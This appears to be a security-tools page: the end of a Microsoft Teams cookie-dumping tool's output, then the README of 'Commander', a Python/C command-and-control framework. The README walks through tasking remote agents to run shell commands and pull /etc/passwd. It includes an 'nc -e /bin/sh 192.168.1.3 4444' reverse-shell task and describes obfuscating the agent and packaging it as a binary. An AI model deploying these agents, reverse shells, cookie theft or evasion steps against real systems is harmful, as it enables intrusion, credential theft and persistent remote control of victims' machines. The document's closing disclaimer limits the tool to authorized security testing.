    Columns in cookies: creation_utc, host_key, top_frame_site_key, name, value, encrypted_value, path, expires_utc, is_secure, is_httponly, last_access_utc, has_expires, is_persistent, priority, samesite, source_scheme, source_port, is_same_party

    Dump the database into a json file

    python.exe .\teams_dump.py teams --get
    [+] Host: teams.microsoft.com
    [+] Cookie Name MUIDB
    [+] Cookie Value: xxxxxxxxxxxxxx
    **************************************************
    [+] Host: teams.microsoft.com
    [+] Cookie Name TSREGIONCOOKIE
    [+] Cookie Value: xxxxxxxxxxxxxx
    **************************************************
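
    Since the cookies table above is a standard Chromium cookie store, listing the entries boils down to a plain SQLite query. A minimal sketch follows; the path to the Teams Cookies database is an assumption (it varies by Teams version), and decrypting encrypted_value additionally requires the DPAPI-protected key, which the PoC handles:

    import sqlite3

    db_path = r"Cookies"  # assumption: a copy of the Teams Chromium cookie DB
    con = sqlite3.connect(db_path)
    for host, name, enc in con.execute(
            "SELECT host_key, name, encrypted_value FROM cookies"):
        print(f"[+] Host: {host}  Cookie: {name}  ({len(enc)} encrypted bytes)")
    con.close()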


    Commander - A Command And Control (C2) Server

    By: Zion3R


    Commander is a command and control framework (C2) written in Python, Flask and SQLite. It comes with two agents written in Python and C.

    Under Continuous Development

    Not script-kiddie friendly


    Features

    • Fully encrypted communication (TLS)
    • Multiple Agents
    • Obfuscation
    • Interactive Sessions
    • Scalable
    • Base64 data encoding
    • RESTful API

    Agents

    • Python 3
      • The python agent supports:
        • sessions, an interactive shell between the admin and the agent (like ssh)
        • obfuscation
        • Both Windows and Linux systems
        • download/upload files functionality
    • C
      • The C agent supports only the basic functionality for now: the control of tasks for the agents
      • Only for Linux systems

    Requirements

    Python >= 3.6 is required, along with the following dependencies.

    Linux is required for admin.py and c2_server.py (untested on Windows).
    apt install libcurl4-openssl-dev libb64-dev
    apt install openssl
    pip3 install -r requirements.txt

    How to Use it

    First create the required certs and keys

    # if you want to secure your key with a passphrase exclude the -nodes
    openssl req -x509 -newkey rsa:4096 -keyout server.key -out server.crt -days 365 -nodes

    Start the admin.py module first in order to create a local sqlite db file

    python3 admin.py

    Continue by running the server

    python3 c2_server.py

    And finally the agent. The Python agent can simply be run, but the C agent needs to be compiled first.

    # python agent
    python3 agent.py

    # C agent
    gcc agent.c -o agent -lcurl -lb64
    ./agent

    By default both the agents and the server run over TLS with base64 encoding. The communication point is set to 127.0.0.1:5000; if a different endpoint is needed, change it in the agents' source files.
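
    As a purely hypothetical illustration (the actual variable names in the Agents sources may differ), the change is typically a one-line constant edit near the top of agent.py:

    # Hypothetical names -- locate the equivalent constants in Agents/agent.py
    C2_HOST = "10.0.0.5"  # instead of the default 127.0.0.1
    C2_PORT = 5000
    C2_URL = f"https://{C2_HOST}:{C2_PORT}"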

    As the Operator/Administrator you can use the following commands to control your agents

    Commands:

    task add arg c2-commands
    Add a task to an agent, to a group, or to all agents.
    arg: can have the following values: 'all' 'type=Linux|Windows' 'your_uuid'
    c2-commands: possible values are c2-register c2-shell c2-sleep c2-quit
    c2-register: Triggers the agent to register again.
    c2-shell cmd: Takes a shell command for the agent to execute, e.g. c2-shell whoami
    cmd: The command to execute.
    c2-sleep: Configures the interval at which an agent checks for tasks.
    c2-session port: Instructs the agent to open a shell session with the server to this port.
    port: The port to connect to. If it is not provided it defaults to 5555.
    c2-quit: Forces an agent to quit.

    task delete arg
    Delete a task from an agent or all agents.
    arg: can have the following values: 'all' 'type=Linux|Windows' 'your_uuid'
    show agent arg
    Displays info for all the available agents or for a specific agent.
    arg: can have the following values: 'all' 'type=Linux|Windows' 'your_uuid'
    show task arg
    Displays the task of an agent or all agents.
    arg: can have the following values: 'all' 'type=Linux|Windows' 'your_uuid'
    show result arg
    Displays the history/result of an agent or all agents.
    arg: can have the following values: 'all' 'type=Linux|Windows' 'your_uuid'
    find active agents
    Drops the database so that the active agents will be registered again.

    exit
    Bye Bye!


    Sessions:

    sessions server arg [port]
    Controls a session handler.
    arg: can have the following values: 'start' , 'stop' 'status'
    port: port is optional for the start arg and if it is not provided it defaults to 5555. This argument defines the port of the sessions server
    sessions select arg
    Select in which session to attach.
    arg: the index from the 'sessions list' result
    sessions close arg
    Close a session.
    arg: the index from the 'sessions list' result
    sessions list
    Displays the available sessions
    local-ls directory
    Lists the files in the selected directory on your host
    download 'file'
    Downloads the 'file' locally into the current directory
    upload 'file'
    Uploads a file into the directory where the agent currently is

    Special attention should be given to the 'find active agents' command. This command deletes all the tables and creates them again. It might sound scary, but it is not; at least that is what I believe :P

    The idea behind this functionality is that the c2 server can ask an agent to re-register in case it doesn't recognize it. So, since we want to clear the db of unused old entries and at the same time find all the currently active hosts, we can drop the tables and trigger the re-register mechanism of the c2 server. See below for the re-registration mechanism.

    Flows

    Below you can find a normal flow diagram

    Normal Flow

    In case where the environment experiences a major failure like a corrupted database or some other critical failure the re-registration mechanism is enabled so we don't lose our connection with our agents.

    More specifically, if we lose the database we will not have any information about the uuids we are receiving, so we can't set tasks for them. The agents will keep trying to retrieve their tasks, and since we don't recognize them we will ask them to register again so we can insert them into our database and control them again.

    Below is the flow diagram for this case.

    Re-register Flow

    Useful examples

    To set up your environment, start admin.py first, then c2_server.py, and then run the agent. Afterwards you can check the available agents.

    # show all availiable agents
    show agent all

    To instruct all the agents to run the command "id" you can do it like this:

    # run a command on all agents
    task add all c2-shell id

    To check the history/previous results of executed tasks for a specific agent, do it like this:

    # check the results of a specific agent
    show result 85913eb1245d40eb96cf53eaf0b1e241

    You can also change the interval at which the agents check for tasks, e.g. to 30 seconds, like this:

    # to set it for all agents
    task add all c2-sleep 30

    To open a session with one or more of your agents do the following.

    # find the agent/uuid
    show agent all

    # enable the server to accept connections
    sessions server start 5555

    # add a task for a session to your prefered agent
    task add your_prefered_agent_uuid_here c2-session 5555

    # display a list of available connections
    sessions list

    # select to attach to one of the sessions, lets select 0
    sessions select 0

    # run a command
    id

    # download the passwd file locally
    download /etc/passwd

    # list your files locally to check that passwd was created
    local-ls

    # upload a file (test.txt) in the directory where the agent is
    upload test.txt

    # return to the main cli
    go back

    # check if the server is running
    sessions server status

    # stop the sessions server
    sessions server stop

    If for some reason you want to run another external session, e.g. with netcat or metasploit, do the following.

    # show all availiable agents
    show agent all

    # first open a netcat on your machine
    nc -vnlp 4444

    # add a task to open a reverse shell for a specific agent
    task add 85913eb1245d40eb96cf53eaf0b1e241 c2-shell nc -e /bin/sh 192.168.1.3 4444

    This way you will have a 'die hard' shell: even if you get disconnected, it will come back up immediately. Only the interactive commands will make it die permanently.

    Obfuscation

    The Python agent offers obfuscation using basic AES-ECB encryption and base64 encoding.

    Edit the obfuscator.py file and change the 'key' value to a 16-character key in order to create a custom payload. The output of the new agent can be found in Agents/obs_agent.py.

    You can run it like this:

    python3 obfuscator.py

    # and to run the agent, do as usual
    python3 obs_agent.py
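
    For illustration, the underlying technique amounts to AES-ECB over the agent source followed by base64. A minimal sketch, assuming the pycryptodome package (the real obfuscator.py may differ):

    from base64 import b64encode

    from Crypto.Cipher import AES
    from Crypto.Util.Padding import pad

    key = b"0123456789abcdef"  # must be 16 characters, as noted above
    with open("agent.py", "rb") as f:
        source = f.read()
    cipher = AES.new(key, AES.MODE_ECB)
    blob = b64encode(cipher.encrypt(pad(source, AES.block_size)))
    # The packed agent would embed 'blob' and reverse these steps at runtime.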

    Tips & Tricks

    1. The built-in Flask app server can't handle multiple/concurrent requests, so you can use the gunicorn server for better performance, like this:
    gunicorn -w 4 "c2_server:create_app()" --access-logfile=- -b 0.0.0.0:5000 --certfile server.crt --keyfile server.key
    2. Create a binary file for your python agent like this:
    pip install pyinstaller
    pyinstaller --onefile agent.py

    The binary can be found under the dist directory.

    In case something fails you may need to update your Python and pip libs. If it continues failing then... well, life happened.

    3. Create new certs for each engagement.

    4. Back up your c2.db; it is easy... just a file.

    Testing

    pytest was used for the testing. You can run the tests like this:

    cd tests/
    py.test

    Be careful: you must run the tests inside the tests directory, otherwise your c2.db will be overwritten and you will lose your data.

    To check the code coverage and produce a nice html report you can use this:

    # pip3 install pytest-cov
    python -m pytest --cov=Commander --cov-report html

    Disclaimer: This tool is only intended to be a proof of concept demonstration tool for authorized security testing. Running this tool against hosts that you do not have explicit permission to test is illegal. You are responsible for any trouble you may cause by using this tool.


